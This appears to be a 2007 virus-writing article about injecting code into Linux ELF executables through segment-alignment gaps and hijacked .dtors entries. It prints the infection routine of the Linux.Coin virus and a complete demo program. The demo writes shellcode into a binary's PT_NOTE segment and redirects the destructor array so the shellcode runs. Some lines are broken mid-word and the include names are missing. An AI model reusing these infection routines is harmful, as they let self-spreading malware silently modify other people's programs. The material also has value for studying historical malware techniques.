Reverse of a coin: A short note on segment alignment
herm1t
Reverse of a coin: A short note on segment alignment
herm1t, oct 2007
One of the widely used method of ELF files infection was propposed by
Silvio Cesare [1]. To inject the virus to a file the free space at the
end of text segment, appeared as a result of alignment is used.
Alignment is neccessary to prevent the beginning of the data segment
and the end of text segment from ending up in the same page. The
"hole" in the memory exist no only in the end of text segment, but
also at the beginning of data segment:
file memory
offset address
|text | |text |
| | | |
f0f |_____| 8048f0f |_____|
f10 |data | 8049f10 |/////| not only here
8049000 +-----+ <- page boundary
|/////| but here too
|/////|
8049f10 +-----+
|data |
The are two ways to align the segment, to pad the previous segment
with zeroes (in file), so the next segment will start in the next
page, but by doing so, the size of the file will grow; or increase the
address of the segment, so the segments will lay in the file
chock-a-block, but the "hole" in the memory will appear. So there are
three types of files:
* Rare case - there is no hole neither in file, nor in memory. Can
do nothing with such file.
* Data segment begins from the offset multiple of page size. Like in
the original method, we will use the padding of code segment.
* Most typical case - no padding, the whole page is available,
because the offsets and addresses of the segments must be
co-aligned. The same page in file (holding the tail of text and
the head of data) is mapped twice and we may "convert" it to the
two separate pages. That is all about.
It follows from the picture above, that for the files of type three,
the space available for virus is exactly equal to the page size, that
is 4096 bytes. And all statistics, like what file can be infected by
virus with length L are of no use. The example of such calculations
can be found in [2].
The data segment may contain the code as well as code segment, despite
of "rw-" permissions, and even ExecShield will have nothing against
it. By the way, to keep the code in the data segment is the ancient
Unix tradition: in the original Unix(R) on PDP-11, the code in the
data segment was used for indirect syscalls [3].
A bit of code (from the Linux.Coin virus, the code not related to
infection was brought from Linux.Caveat):
for (ok = 0, i = 0; i < ehdr->e_phnum; i++)
if (phdr[i].p_type == PT_LOAD && phdr[i].p_offset == 0 &&
(i + 1) < ehdr->e_phnum && phdr[i + 1].p_type == PT_LOAD
&& phdr[i + 1].p_filesz > 0) {
if (phdr->p_filesz != phdr->p_memsz)
break;
ok++;
break;
}
if (! ok)
goto error2;
uint32_t dp, tp, ve, vo;
vo = phdr[i].p_filesz;
ve = phdr[i].p_vaddr + phdr[i].p_filesz;
tp = 4096 - (phdr[i].p_filesz & 4095);
dp = phdr[i + 1].p_vaddr - (phdr[i + 1].p_vaddr & ~4095);
if (tp + dp < size || tp == 0x1000)
goto error2;
/* we will use the padding in the text segment */
phdr[i].p_memsz += tp;
phdr[i].p_filesz += tp;
/* ... and this space is also available */
if (dp != 0) {
phdr[i+1].p_vaddr -= dp;
phdr[i+1].p_paddr -= dp;
phdr[i+1].p_offset += tp;
phdr[i+1].p_filesz += dp;
phdr[i+1].p_memsz += dp;
}
/* fix PHT */
for (i = i + 2; i < ehdr->e_phnum; i++)
if (phdr[i].p_offset >= vo)
phdr[i].p_offset += tp + dp;
/* insert the page */
if (dp != 0) {
ftruncate(h, l + tp + dp);
m = (char*)mremap(m, l, l + tp + dp, 0);
memmove(m + vo + tp + dp, m + vo, l - vo);
}
/* fix SHT */
if (ehdr->e_shoff >= vo)
ehdr->e_shoff += (tp + dp);
Elf32_Shdr *shdr = (Elf32_Shdr*)(m + ehdr->e_shoff);
for (i = 0; i < ehdr->e_shnum; i++, shdr++)
if (shdr->sh_offset >= vo)
shdr->sh_offset += (tp + dp);
/* copy the virus body */
memcpy(m + vo, self, size);
Let's look how PHT is changed by the exmple of /bin/uname:
before
LOAD 0x000000 0x08048000 0x08048000 0x032b8 0x032b8 R E 0x1000
LOAD 0x0032b8 0x0804c2b8 0x0804c2b8 0x00662 0x00662 RW 0x1000
DYNAMIC 0x0033e0 0x0804c3e0 0x0804c3e0 0x000c8 0x000c8 RW 0x4
after
LOAD 0x000000 0x08048000 0x08048000 0x04000 0x04000 R E 0x1000
LOAD 0x004000 0x0804c000 0x0804c000 0x0091a 0x0091a RW 0x1000
DYNAMIC 0x0043e0 0x0804c3e0 0x0804c3e0 0x000c8 0x000c8 RW 0x4
Virus is partially located both in code and data segments.
CRT funny STUFF
Izik in his paper [4] pointed out that constructors and destructors
might be used in viruses, but provided no actual code. The problem is
that you cannot resize those sections after compilation to add your
pointers. I'll show you here how to get the promissed fun.
Let's look closer to the functions processing the arrays:
(defined in crtstuff.c)
static void __do_global_ctors_aux () {
func_ptr *p;
for (p = __CTOR_END__ - 1; *p != (func_ptr) -1; p--)
(*p) ();
}
static void __do_global_dtors_aux () {
func_ptr *p;
for (p = __DTOR_LIST__ + 1; *p; p++)
(*p) ();
}
Suppose, for descriptive reasons, that we have a hello-program with
one constructor (foo) and one destructor (bar):
void __attribute__((constructor)) foo (void) {puts("foo");}
void __attribute__((destructor)) bar (void) {puts("bar");}
main(){puts("hello");}
The output of the program will look like this:
$ ./hello
foo
hello
bar
Note that .jcr section immediately follows the .dtors and usually has
zero, this zero might be used as a terminator for the .dtors array and
original one could be replaced with virus entry point:
.eh_frame: ........ You may override value stored here with Fs if y
ou
don't care about exception handling
.ctors: FFFFFFFF Put here virus address, if you agreed with abov
e
foo __CTOR_END__-1, look down from here until FFFFF
FFF
00000000 __CTOR_END__
.dtors: FFFFFFFF __DTOR_LIST__ (some systems put counter here)
bar __DTOR_LIST___+1, look up from here, until 0
00000000 Put here virus address
.jcr: 00000000 We usually have 0 here, so we can overwrite
the previous one.
Here is the simple demo that shows how to use .dtors/.jcr:
#include
#include
#include
#include
unsigned char code[32] = {
0x90, 0x90, 0x90, 0x90, 0x90, 0x60, 0x6a, 0x04,
0x58, 0x6a, 0x01, 0x5b, 0xe8, 0x07, 0x00, 0x00,
0x00, 0x54, 0x45, 0x53, 0x54, 0x21, 0x21, 0x0a,
0x59, 0x6a, 0x05, 0x5a, 0xcd, 0x80, 0x61, 0xc3,
};
int main(int argc, char **argv)
{
if (argc < 2)
return 2;
int h = open(argv[1], 2);
int l = lseek(h, 0, 2);
char *m = mmap(NULL, l, PF_R|PF_W, MAP_SHARED, h, 0);
if (m == MAP_FAILED)
return 2;
Elf32_Ehdr *ehdr = (Elf32_Ehdr*)m;
Elf32_Phdr *phdr = (Elf32_Phdr*)(m + ehdr->e_phoff);
Elf32_Shdr *shdr = (Elf32_Shdr*)(m + ehdr->e_shoff);
char *strtab = m + shdr[ehdr->e_shstrndx].sh_offset;
int i;
uint32_t *cons;
for (cons = NULL, i = 1; i < ehdr->e_shnum; i++)
if (! strcmp(strtab + shdr[i].sh_name, ".dtors"))
cons = (uint32_t*)(m + shdr[i].sh_offset + shdr[i].sh_s
ize - 4);
printf("%08x %08x\n", cons[0], cons[1]);
if (cons == NULL || cons[0] != 0 || cons[1] != 0)
return 2;
for (i = 0; i < ehdr->e_phnum; i++) {
if (phdr[i].p_type == PT_NOTE) {
phdr[i].p_type = PT_NULL;
cons[0] = phdr[i].p_vaddr;
memcpy(m + phdr[i].p_offset, code, 32);
}
}
munmap(m, l);
close(h);
return 0;
}
Run it on hello and voila!
$ ./hello
foo
hello
bar
TEST!
Also, if you know that there are no (de-)con-structors in the program,
you can adjust values inside __do_global_[cd]tors_aux routines to
point it somewhere else and free space occupied by arrays or remove
the initialization routines completely, possibly including _fini and
frame_dummy (don't forget about calls to them from __libc_csu_fini and
_init).
The Coin virus uses this method to get the control from host without
overriding ELF file entry point.
That's kinda all.
References
1. Silvio Cesare "Unix viruses", 1999
2. Konrad Rieck, Konrad Kretschmer "BRUNDLE FLY: A good-natured Linux
ELF virus", 2001
3. herm1t "The Dawn Virus: Tribute to UNIX/PDP-11", 2006
4. izik "Abusing .CTORS and .DTORS for fun 'n profit"